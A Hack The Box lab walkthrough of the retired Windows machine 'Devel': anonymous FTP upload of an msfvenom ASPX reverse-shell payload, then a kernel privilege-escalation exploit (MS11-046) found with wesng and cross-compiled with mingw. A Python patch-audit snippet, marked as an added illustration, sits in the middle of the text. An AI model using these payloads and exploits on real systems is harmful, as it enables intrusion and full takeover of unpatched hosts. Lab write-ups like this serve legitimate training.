HTB Walkthrough : Devel

Today we are going to solve another boot-to-root Windows machine created by ch4p. It is a retired lab, available in the Hack The Box retired section. Let's jump into it.

Level : Easy

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • FTP Enumeration
  • Exploitation
    • ASPX reverse shell
  • Privilege Escalation
    • MS11-046 Exploit

Walkthrough

IP address : 10.129.68.202

We start by firing Nmap with an aggressive scan (-A), in which OS detection, the default script scan, traceroute and version scanning are all done.

Enumeration

 nmap -A 10.129.68.202 

The Nmap output shows that port 21 (FTP) is open with anonymous login allowed, which gives us a window to get our initial foothold. It also shows that the machine is Windows based and that an IIS server is hosted on port 80.

Nmap scan report for 10.129.68.202
Host is up (0.16s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Now we start enumerating port 21, i.e. the FTP service, and one thing catches our eye: the IIS root directory is accessible, because the FTP shared folder is the same directory that IIS serves.

echo "10.129.68.202 devel.htb" | sudo tee -a /etc/hosts
Username : Anonymous
Password : Anonymous
ftp devel.htb

We can confirm this by adding a temporary file on the target machine and then checking whether we can reach it over HTTP. So we upload a small HTML file with some text and then check it by requesting the file's path.

Exploitation

After successfully accessing our temporary page we can move on to exploitation. Here we are going to create the payload in ASPX format. To learn more about why an ASPX payload is used, you can check it out here.

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4445 -f aspx > shell.aspx

Once the payload is ready, it is time to test it by uploading it via the FTP service. Once it is uploaded, we call the file with the help of curl or a browser and we get our initial foothold on the lab.

curl "http://10.129.68.202/shell.aspx"

If everything is done correctly, we get our shell.

Privilege Escalation

Now it is time to get higher privileges. For that we need administrator rights, so we have to enumerate more about the machine: the OS version, installed patches, and any other information we can use later. Windows has the systeminfo command, which we can use to enumerate the machine.

systeminfo.exe > systeminfo.txt 
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31
System Boot Time:          21/4/2021, 4:49:31
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.470 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.551 MB
Virtual Memory: In Use:    590 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 4
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.68.202
                                 [02]: fe80::4a6:d5ca:df49:2a13
                                 [03]: dead:beef::f442:8dbc:7624:dbab

As we can see, no patches are installed on this machine, so we may be able to go for a kernel exploit. There are various ways to proceed: we can use the Metasploit Framework's exploit suggester module and then use any listed exploit, or we can do it manually. For this article we do it manually because we want to learn more.

For that we use the tool called wesng, which you can get from GitHub. To work with this tool, all we need to do is pass it the systeminfo output so that it can list all the possible ways to exploit the machine.

WES-NG is a tool based on the output of Windows’ systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.

python wes.py systeminfo.txt --exploits-only -i "Elevation of Privilege"
Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows 7 for 32-bit Systems
    - Generation: 7
    - Build: 7600
    - Version: None
    - Architecture: 32-bit
    - Installed hotfixes: None
[+] Loading definitions
    - Creation date of definitions: 20210416
[+] Determining missing patches
[+] Applying display filters
[+] Found vulnerabilities

Date: 20130108
CVE: CVE-2013-0008
KB: KB2778930
Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: http://www.exploit-db.com/exploits/24485

Date: 20110614
CVE: CVE-2011-1249
KB: KB2503665
Title: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/40564/

Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/

Date: 20100209
CVE: CVE-2010-0232
KB: KB977165
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip, http://www.securityfocus.com/bid/37864

[+] Missing patches: 4
    - KB977165: patches 1 vulnerability
    - KB2778930: patches 1 vulnerability
    - KB2393802: patches 1 vulnerability
    - KB2503665: patches 1 vulnerability
[+] KB with the most recent release date
    - ID: KB2778930
    - Release date: 20130108

[+] Done. Displaying 4 of the 236 vulnerabilities found.
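As an added illustration (not part of the original walkthrough, and not wesng's own code), the following Python does in miniature what WES-NG does with the systeminfo output: it parses the build, architecture and installed hotfixes, then diffs the hotfix list against the four KBs listed above, which is the same check a patch-compliance audit would run on a fleet. The two samples and the KB-to-CVE table are constructed from the output shown on this page; wesng's real definitions cover far more than four entries.

```python
import re

# Constructed excerpt of the systeminfo output shown above (unpatched host).
UNPATCHED = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed variant with two hotfixes applied, showing systeminfo's continuation-line format.
PARTLY_PATCHED = """\
Host Name:                 DEVEL2
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2503665
                           [02]: KB2778930
Network Card(s):           1 NIC(s) Installed.
"""

# Kernel EoP fixes wesng flagged for this build (KB -> CVE, taken from the output above).
KNOWN_FIXES = {
    "KB977165": "CVE-2010-0232",
    "KB2393802": "CVE-2010-4398",
    "KB2503665": "CVE-2011-1249",
    "KB2778930": "CVE-2013-0008",
}

def parse_systeminfo(text):
    """Extract build number, architecture and installed KB ids from systeminfo text."""
    info = {"build": None, "arch": None, "hotfixes": set()}
    key = None
    for line in text.splitlines():
        if line[:1].isspace():                  # indented continuation of the previous field
            if key == "Hotfix(s)":
                info["hotfixes"].update(re.findall(r"KB\d+", line))
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "OS Version":
            m = re.search(r"Build (\d+)", value)
            info["build"] = int(m.group(1)) if m else None
        elif key == "System Type":
            info["arch"] = "64-bit" if value.lower().startswith("x64") else "32-bit"
        elif key == "Hotfix(s)":                # "N/A" or "2 Hotfix(s) Installed." carry no KB ids
            info["hotfixes"].update(re.findall(r"KB\d+", value))
    return info

def missing_patches(info, fixes=KNOWN_FIXES):
    """Return {KB: CVE} for every known fix that is not in the installed hotfix set."""
    return {kb: cve for kb, cve in fixes.items() if kb not in info["hotfixes"]}
```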

The result shows four possible exploits. In my case https://www.exploit-db.com/exploits/40564/ worked fine; all we have to do is compile it. We can get the exploit from Exploit-DB, or searchsploit can also play that role.

searchsploit -m 40564 

It is time to compile the exploit. For that we need a GCC cross-compiler, which we can install as it is available in the Kali repository. Once the exploit is compiled, we transfer it to the target machine and run it.

sudo apt-get update && sudo  apt-get install mingw-w64
i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32

Here we get administrator privileges, and now we can read the flags and submit them to the portal.

type "C:\Users\Administrator\Desktop\root.txt"
type "C:\Users\babis\Desktop\user.txt.txt"
